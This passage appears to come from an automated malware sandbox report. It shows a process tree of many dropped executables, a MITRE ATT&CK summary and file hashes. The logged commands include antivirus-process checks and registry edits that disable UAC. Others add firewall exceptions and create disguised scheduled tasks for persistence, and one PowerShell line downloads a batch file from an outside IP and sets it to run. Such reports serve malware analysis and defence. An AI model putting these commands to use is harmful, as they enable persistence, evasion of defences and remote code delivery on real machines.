C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
PID:5380
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe"C:\Users\Admin\AppData\Local\Temp\Files\DeliciousPart.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c move Tall Tall.bat & Tall.bat4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5788 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5816
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵
- System Location Discovery: System Language Discovery
PID:5824
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3498775⤵
- System Location Discovery: System Language Discovery
PID:5944
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "ORDINANCECHILDHOODCONVERTENDORSED" Booty5⤵
- System Location Discovery: System Language Discovery
PID:5952
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Norwegian + ..\Mysql + ..\Tours + ..\Awareness + ..\Picking K5⤵
- System Location Discovery: System Language Discovery
PID:5972
-
-
C:\Users\Admin\AppData\Local\Temp\349877\Faced.pifFaced.pif K5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5984 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "BioMind" /tr "wscript //B 'C:\Users\Admin\AppData\Local\BioTech Dynamics\BioMind.js'" /sc onlogon /F /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:6016
-
-
C:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\349877\RegAsm.exe6⤵
- Executes dropped EXE
PID:3572
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 155⤵
- System Location Discovery: System Language Discovery
PID:5996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"3⤵
- Executes dropped EXE
PID:3188
-
-
C:\Users\Admin\AppData\Local\Temp\Files\china.exe"C:\Users\Admin\AppData\Local\Temp\Files\china.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1636 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.funletters.net/readme.htm4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4856 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4856 CREDAT:275457 /prefetch:25⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa.exe"3⤵
- Executes dropped EXE
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe"C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1216 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\spectrum.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3276
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3344 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Meeting.exe"C:\Users\Admin\AppData\Local\Temp\Files\Meeting.exe"3⤵
- Executes dropped EXE
PID:1616 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Icon.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Icon.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1684
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\444.exe"C:\Users\Admin\AppData\Local\Temp\Files\444.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3128 -
C:\Users\Admin\AppData\Roaming\conhost.exe"C:\Users\Admin\AppData\Roaming\conhost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3724 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\conhost.exe" "conhost.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\out.exe"C:\Users\Admin\AppData\Local\Temp\Files\out.exe"3⤵
- Executes dropped EXE
PID:1156
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"C:\Users\Admin\AppData\Local\Temp\Files\pi.exe"3⤵
- Executes dropped EXE
PID:4560
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe"C:\Users\Admin\AppData\Local\Temp\Files\Documents.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe"C:\Users\Admin\AppData\Local\Temp\Files\ohtie89k.exe"3⤵
- Executes dropped EXE
PID:2428 -
C:\ProgramData\windows.exe"C:\ProgramData\windows.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584
-
-
C:\ProgramData\service.exe"C:\ProgramData\service.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
PID:2240 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "service" /tr "C:\Users\Admin\AppData\Roaming\service.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted_c360a5b7.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted_c360a5b7.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2268 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 524⤵
- Program crash
PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\up.exe"C:\Users\Admin\AppData\Local\Temp\Files\up.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3320
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4252 -
C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE"C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe"C:\Users\Admin\AppData\Local\Temp\Files\Java32.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4400 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:1768
-
-
C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"C:\Users\Admin\AppData\Roaming\Programfiles\java.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4184 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 1684⤵
- Program crash
PID:4228
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4420 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3448
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dropper64.exe"C:\Users\Admin\AppData\Local\Temp\Files\dropper64.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4708 -
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"4⤵PID:4776
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4776 -s 205⤵PID:3928
-
-
-
C:\Windows\system32\msiexec.exe"C:\Windows\system32\msiexec.exe"4⤵PID:4840
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4840 -s 1845⤵PID:5276
-
-
-
C:\Windows\system32\audiodg.exe"C:\Windows\system32\audiodg.exe"4⤵PID:4792
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4792 -s 205⤵PID:1000
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1976 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CB0C.tmp\CB0D.tmp\CB0E.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"4⤵PID:2236
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
- Modifies Internet Explorer settings
PID:2332 -
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target6⤵
- System Location Discovery: System Language Discovery
PID:2056 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CD4E.tmp\CD4F.tmp\CD50.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"7⤵PID:6040
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:3332
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:5700
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:5780
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"8⤵PID:5752
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command9⤵PID:1880
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.pornhub.com/8⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3348 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3348 CREDAT:275457 /prefetch:29⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5796
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"8⤵
- Command and Scripting Interpreter: PowerShell
PID:2304
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3680
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵PID:3140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cock.exe"C:\Users\Admin\AppData\Local\Temp\Files\cock.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- System Location Discovery: System Language Discovery
PID:3172
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4176 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4356
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3928 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2564
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2676
-
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:872
-
-
C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe"C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe"2⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:5292
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1571EEFF-3AA5-41DA-8E63-723BF43DBB63} S-1-5-21-1488793075-819845221-1497111674-1000:UPNECVIU\Admin:Interactive:[1]1⤵
- Loads dropped DLL
PID:4456 -
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4516
-
-
C:\Users\Admin\AppData\Roaming\service.exeC:\Users\Admin\AppData\Roaming\service.exe2⤵
- Executes dropped EXE
PID:5612
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0xc41⤵PID:6068
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Access Token Manipulation
1Create Process with Token
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
5Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
7Subvert Trust Controls
1Install Root Certificate
1Discovery
Peripheral Device Discovery
1Process Discovery
1Query Registry
2Remote System Discovery
1System Information Discovery
2System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
914B
MD5e4a68ac854ac5242460afd72481b2a44
SHA1df3c24f9bfd666761b268073fe06d1cc8d4f82a4
SHA256cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f
SHA5125622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
Filesize252B
MD5be25b8bdc36e9562d57d41142bfe1773
SHA17ba91d36caf19ee5ac6ba642487370bb0b5cc24f
SHA256954ec868f5032ef77c0088d5d71243ac5a006b67be9b17234db163eb5583fe2a
SHA512248f02867a96eeb95ba80f690db90fdce166ae8221a72e84da24dd669208df66a7dd2d5949fff6b91cb3eb12180f4a19bda48882056c04fefeb5cae931dd2e7e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C
Filesize252B
MD56505371b93dba4059eca385d5207e60b
SHA1bf0325b9ae7f2e28eab345ed38759e4815d2fa5d
SHA256e17e77af9bc399a64f406f88e0c05747797f86f5b099977b0124cdd2d922cd75
SHA512934cf854d28cd9424dfd9c4af81e3e3d273177f3d304a90ff3f406566aea4ab154b6da59d51de012793e085f11fce31218bbec50d5828559b24e35eca4f04a17
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD548e22ed031d19161fd5a48dd8369b06f
SHA1f2272f1528de34c716cc98dfc05e3992a28ba349
SHA2560546e5b4c244d9c177cd10dc17fdc8455603b0f4f0597769ed3ab8b33e6231a6
SHA51289c06aacc9f25aa8a0e40bb47c1d883c60c3a31ddd5338bc4196eb3589d772057bc5d2b9cd70325e8b0ef3b6d546041e1e193b5cf9b256150b2d21435a341342
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f35392e55005dfa427810c0875fd06ed
SHA1b94b07a25f1b8e22465290d4105c81d81687e510
SHA25662311172ebe103467890585afc09faba08cc8353577d85531f9944cd23e3b104
SHA512a994a91c85548f346538c6a53622e51b9ced153fde0340d300a2d6b54dd7811603516ad3ad7f36e46c38598ddbace87eb30440141b2e1829d467cb52cb124d7d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5496dca048078b0aa49e041232ca2436c
SHA1e008d65d952b2af8a927ce2b26666a2814b1737d
SHA2566a80583dacbd23ab99d82abdbdc5919bce2a183639dac1621be5d48c73739c30
SHA51220f1227b32d316a558b76999116b74486a6d7651adf09802a975cd772b5c73606e502891a61dac411f14ab68add6149a42a1327bd7283a639e639baee5c032a6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD52c3bacdf182aacfb15ebc539ff6c6f87
SHA124a62f23c105ca74ef250761c4612dccd5189943
SHA256c582b777831640d4f90cb42e39545f436966473294e9554ac02cf4abb1128353
SHA512bd97189c1ef59c46075eda10c55b22973322b5ad465488b5f83d359ad90e867fb8018805369a874516e0d4980b3b51891e101a42534f0169251cac7b4c6d67ea
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55021974ec06cfbbf7da95add5540052d
SHA14ef9635af74eeb425c9ad84e3f78270e0a73f161
SHA2561fe793309edda300370238eb8b42d26e17a3ba86cb47dbc6025a1a3351b73da4
SHA512df6ce37bd913d1a4702444f81f4e4298dcd9db83b039cc578d294ddd8f464ec405956279af40f5ecfae1c14e739e287431b462cbe3144027c1acbc3b488f4034
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e07730b9ac075cd6acab925b9eb39317
SHA1cdd567a3900a210d251c4f3262987dcb0e02d471
SHA256cac5be138d84513808035e0f8608efd0eb575b9d859e4854c161c10a72619307
SHA5122e01f3d015bd906ea833ce7527132c19b910a9b31b7712affdd82be7c0bc7c7bec18d0caec9ab0d89e143e634086f92752f7351495e576955abe967b00d7018b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5eb4c95fa7e35b443ec309ccca0c14ef4
SHA18d797fdeb4a13b39f1ba0f21f2bceadc5d2af8a7
SHA256871c4cf7208d10e41f071dc446fd9455794da04261890a5fa961742d2eb45e1b
SHA5121db7a2446b3182b39c6e1462495d09b850c5c7cc05de92f0076f16a7bb2edfcb1828ee5ff9d67ff4d5954985760f70361995d73debd0776f08fc878f6ada5566
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD544600d1ea91f6c80545ff9da301d0abf
SHA14b1b8e3eccccefbcd0a6cf8703146ba374f912a3
SHA2565ca083d0fb500cbb1ef540e79955053f36e09c9b8afc284057692601bb571dab
SHA512798fa62d6a6422b9f261ee1dbe5b634ab9777ed0a01b3fcf5ee843b83544df8cd5479cc19d770e970a6ef5229261c88b960eea12f52ba437c7d7d83edddf2ba6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5bb741f99ab0836e898c50a981ea254a0
SHA1642741f7d7c7cfd41c57afcd438167ab5194d025
SHA2566783f147590ab271f1f2625026146eebe4be899e4a6673a6a42eb005e37b4208
SHA512a4467eec94e88dff30e3aa72fdee16bdcab320b0413485efde4bfbe977cc2599698e4824f540417dffc6f910c5b8cd30a898b8b561b08a75840071b98da1dbea
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5961f5e284ecf32afefb76f2e8d70d615
SHA172ad09ab15538ba5d2e6e0a18556fbed762d4ff9
SHA2566596cd38e9201c5b5bd3de89b59eb547a451e953bc880df081557a3515bd8550
SHA51267134794178059761eb7c7d20d6caeb523c0711b5570250dbc0307669eef144a1e839ed91aa6e4b060d2ae6f7f51bf3c1ad1d4c04b1d10785578f56e1d08e09f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55c731a0a0a8ccca1bc39ea8767db9ba1
SHA1ed3cb417ec683795f4a3df05c53d53000841c54c
SHA25631143dabfcff92c638a05f10ecfb687e7aab7f743be6ae09be77d234aca21cea
SHA512e3bbb474ac8257603e120008ff0c2e602dc3c8a7f022c26effa6bdefecd587b9e11a659da86257ec2653744103c8196821cc7d2c4a5c6df4c744901f8d249470
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5a19fb003e67d99baf1352773ed82bf97
SHA17b257e7b3926bad7ee515d10616a259d12a9f286
SHA256fe71e9c8fcfaba14e0c0aeef60adc30629ae7747e22dd0725fd3c454729ee68e
SHA512f4da8b9c5b8e6f6dd931729c0117e9a96ef6458a6b82a9e50a367a9552054ad938fd4cf1da4c45bd9bd3b2a3f3cf18b96ac65611c08e7840e044042dba447989
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fd29e976386efd04a6da67c9956df482
SHA11a28888b2025754516d1d580114de94ebd1b06c1
SHA2566fa50703625e6c96a028704e179011a654d30bcf2ff7dafcb7a7b82e620771cf
SHA512e6646489381f89eee2a23f890e687365746bf098646c98f54ec2018bc587ec643b7834680b1de486bf5aa5a644d94c83028189e04ab2b195cdbeb897f6bd5d21
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54393cc15fd61c389cf38dbb7a0b175cc
SHA11d0276192cab21f9216e4030cdd3b4baaea3c564
SHA2569fd812688d069130bbc7fc3bb0288bd7e23da8dee2b54e51a4e53d1e1457c3ba
SHA5128717a453cf0bc92fb883c3f7b2e7d71875f23bd2c521355cb96b889fd8a96987bf860174996679c0bc761bed2f8670de4945f5bcb8d1b88aaa4016aaf378e62e
-
